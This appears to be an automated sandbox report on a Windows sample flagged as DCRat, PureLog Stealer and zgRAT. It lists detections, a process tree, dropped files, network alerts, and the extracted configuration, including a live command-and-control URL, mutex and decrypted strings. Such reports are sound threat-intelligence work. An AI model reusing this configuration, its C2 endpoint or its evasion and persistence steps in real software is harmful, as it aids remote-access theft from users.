Edit tour

Windows Analysis Report
67VB5TS184.exe

Overview

General Information

Sample name:	67VB5TS184.exe renamed because original name is a hash value
Original sample name:	67247063bfbf3eedfdfd183e8235a5e8.exe
Analysis ID:	1580835
MD5:	67247063bfbf3eedfdfd183e8235a5e8
SHA1:	b64ea61f13d24490df89a9dca8f42273a7f6c034
SHA256:	1f95432ab7c23f582acbb0e94d153813d030d74ea12ecef3df325ef5583a8015
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Drops PE files to the user root directory

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to detect virtual machines (SLDT)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: PowerShell Module File Created By Non-PowerShell Process

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

67VB5TS184.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\67VB5TS184.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cmd.exe (PID: 5160 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EtVpSBU0kW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3648 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6556 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WinStore.App.exe (PID: 2556 cmdline: "C:\Users\user\PrintHood\WinStore.App.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cmd.exe (PID: 3136 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rfQPUbaSjc.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1576 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5804 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WinStore.App.exe (PID: 3652 cmdline: "C:\Users\user\PrintHood\WinStore.App.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cmd.exe (PID: 5544 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lRXC83nrKa.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5160 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4320 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WinStore.App.exe (PID: 1196 cmdline: "C:\Users\user\PrintHood\WinStore.App.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cmd.exe (PID: 1632 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wtO4vJVMF8.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6464 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6380 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WinStore.App.exe (PID: 5228 cmdline: "C:\Users\user\PrintHood\WinStore.App.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cmd.exe (PID: 6304 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zd3m5m79sA.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6524 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 2104 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WinStore.App.exe (PID: 5440 cmdline: "C:\Users\user\PrintHood\WinStore.App.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cmd.exe (PID: 4612 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HY3kVmQ00V.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1252 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5808 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WinStore.App.exe (PID: 828 cmdline: "C:\Users\user\PrintHood\WinStore.App.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cmd.exe (PID: 3524 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2ucUGghGnf.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2824 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 2924 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WinStore.App.exe (PID: 5580 cmdline: "C:\Users\user\PrintHood\WinStore.App.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cmd.exe (PID: 4448 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Q8sISb3ARb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6360 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5492 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WinStore.App.exe (PID: 7124 cmdline: "C:\Users\user\PrintHood\WinStore.App.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cmd.exe (PID: 5812 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0T9X0LKmT6.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2104 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 5536 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WinStore.App.exe (PID: 3656 cmdline: "C:\Users\user\PrintHood\WinStore.App.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cmd.exe (PID: 5252 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ge8uHQboyx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 984 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 6620 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WinStore.App.exe (PID: 1856 cmdline: "C:\Users\user\PrintHood\WinStore.App.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cmd.exe (PID: 4164 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OTvWQnNRQU.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2584 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 728 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WinStore.App.exe (PID: 3712 cmdline: "C:\Users\user\PrintHood\WinStore.App.exe" MD5: 67247063BFBF3EEDFDFD183E8235A5E8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp", "MUTEX": "DCR_MUTEX-Kdw2wxPjwQNy3YcCFvJa", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
67VB5TS184.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
67VB5TS184.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2039311964.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2074513502.00000000131FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: 67VB5TS184.exe PID: 6628	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WinStore.App.exe PID: 2556	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.67VB5TS184.exe.ab0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.67VB5TS184.exe.ab0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

Sigma detected: PowerShell Module File Created By Non-PowerShell Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\67VB5TS184.exe, ProcessId: 6628, TargetFilename: C:\Program Files (x86)\windowspowershell\Modules\SystemSettings.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T10:22:10.901805+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49712	104.21.38.84	80	TCP
2024-12-26T10:22:23.573733+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49726	104.21.38.84	80	TCP
2024-12-26T10:22:36.542519+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49757	104.21.38.84	80	TCP
2024-12-26T10:22:44.995658+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49773	104.21.38.84	80	TCP
2024-12-26T10:22:57.995678+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49805	104.21.38.84	80	TCP
2024-12-26T10:23:10.761385+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49834	104.21.38.84	80	TCP
2024-12-26T10:23:23.277101+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49865	104.21.38.84	80	TCP
2024-12-26T10:23:35.792694+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49894	104.21.38.84	80	TCP
2024-12-26T10:23:44.261485+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49915	104.21.38.84	80	TCP
2024-12-26T10:23:56.589807+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49943	104.21.38.84	80	TCP
2024-12-26T10:24:05.730290+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49964	104.21.38.84	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 67VB5TS184.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://649521cm.renyash.ru/	Avira URL Cloud: Label: malware
Source: http://649521cm.renyash.ru	Avira URL Cloud: Label: malware
Source: http://649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\rfQPUbaSjc.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\OTvWQnNRQU.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\HY3kVmQ00V.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\ge8uHQboyx.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\zd3m5m79sA.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\DhBojCdn.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\0T9X0LKmT6.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\DTgFmlup.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\EtVpSBU0kW.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\IJkognUh.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\Q8sISb3ARb.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\BJKEmTPo.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\lRXC83nrKa.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\wtO4vJVMF8.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\2ucUGghGnf.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: 00000000.00000002.2074513502.00000000131FA000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp", "MUTEX": "DCR_MUTEX-Kdw2wxPjwQNy3YcCFvJa", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	ReversingLabs: Detection: 71%
Source: C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe	ReversingLabs: Detection: 71%
Source: C:\Users\Default\hjAOLvfTLePJensZtANoSVrh.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\BJKEmTPo.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\DTgFmlup.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\DdlpkQmL.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\DhBojCdn.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\EVFwVPZl.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\GJkyKHuU.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\IJkognUh.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\JNwXPUdL.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\MhOXPBbk.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\MpypukBp.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\OJgNpsGn.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\OlLEhJlc.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\PetFAjEL.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\RhNXkKhf.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\RpfWQkOw.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\RwkTfkwc.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\TzBXQCtx.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\UHGUfCbd.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\UtqvUxyo.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\VtdtDXyC.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\WQhnzdgR.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\YxKDZEBV.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\dWzlEqNV.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\inwSqFnU.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\kdUIYmJG.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\krQkZgRp.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\nfGqtVNB.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\qdPghqvM.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\rRFIZzDC.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\uajAJJWW.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\wOaGdxSj.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\wYfqbcKE.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\whTRrWrT.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\xevZNWFO.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\ybRYxLPz.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\zssgqxCT.log	ReversingLabs: Detection: 25%
Source: C:\Windows\SysWOW64\sr-Latn-RS\hjAOLvfTLePJensZtANoSVrh.exe	ReversingLabs: Detection: 71%

Multi AV Scanner detection for submitted file

Source: 67VB5TS184.exe	ReversingLabs: Detection: 71%
Source: 67VB5TS184.exe	Virustotal: Detection: 55%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DTgFmlup.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HGMGgHJP.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\FgXXGzqG.log	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\IJkognUh.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EDFigHLC.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 67VB5TS184.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2074513502.00000000131FA000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-Kdw2wxPjwQNy3YcCFvJa","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000000.00000002.2074513502.00000000131FA000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://649521cm.renyash.ru/","PipeToJavascriptRequestpollcpubasetestprivateTemp"]]

Source: 67VB5TS184.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 67VB5TS184.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mscorlib.pdb source: WinStore.App.exe, 00000011.00000002.2430632758.000000001B5E3000.00000004.00000020.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3253097663.000000001B99C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Formsib.pdb source: WinStore.App.exe, 00000035.00000002.3253097663.000000001B9AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: system.windows.forms.dllib.pdb source: WinStore.App.exe, 0000002B.00000002.3038773642.000000001B8C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Formsib.pdb. source: WinStore.App.exe, 00000030.00000002.3127795731.000000001AFC6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Accessibility.pdbAY source: WinStore.App.exe, 00000011.00000002.2430632758.000000001B5E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bb.pdb-) source: WinStore.App.exe, 00000021.00000002.2783241137.000000001B600000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: b.pdb source: WinStore.App.exe, 00000021.00000002.2783241137.000000001B689000.00000004.00000020.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2915572093.000000001BBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Formsib.pdbD source: WinStore.App.exe, 00000016.00000002.2520278011.000000001B326000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Formsib.pdbi;V0< source: WinStore.App.exe, 0000002B.00000002.3038773642.000000001B8C2000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49726 -> 104.21.38.84:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49712 -> 104.21.38.84:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49757 -> 104.21.38.84:80
